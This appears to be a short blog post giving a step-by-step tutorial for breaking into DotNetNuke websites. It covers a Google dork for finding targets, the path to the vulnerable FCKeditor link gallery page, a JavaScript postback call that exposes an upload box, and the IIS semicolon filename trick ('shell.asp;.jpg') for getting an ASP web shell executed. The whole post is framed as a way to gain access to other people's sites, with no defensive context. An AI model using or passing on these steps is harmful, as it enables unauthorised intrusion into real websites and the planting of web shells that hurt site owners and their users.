Here i am going to point out how to exploit a vuln in dnn ie dotnenuke site to gain access to a site

1) find a dotnetNuke site
2) google dork :- inurl:default.aspx

3) suppose u find the site http://siteName/default.aspx
4) go to the location http:siteName/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
5) if its vul a link gallery page will be open  as shown


6)if you now paste the following javascript code into the address bar and hit enter: “javascript:__doPostBack('ctlURL$cmdUpload','')” a upload box will come into the section as shown


7)Now u can upload the img or any fileon the path which u can specify from drop down  to upload a asp shell u have to rename a asp file with semi colon after asp as shown beloaw

eg : shell.asp;.jpg

9) since iis will not recognize extension after semi colon it will execute the shell as asp


Post a comment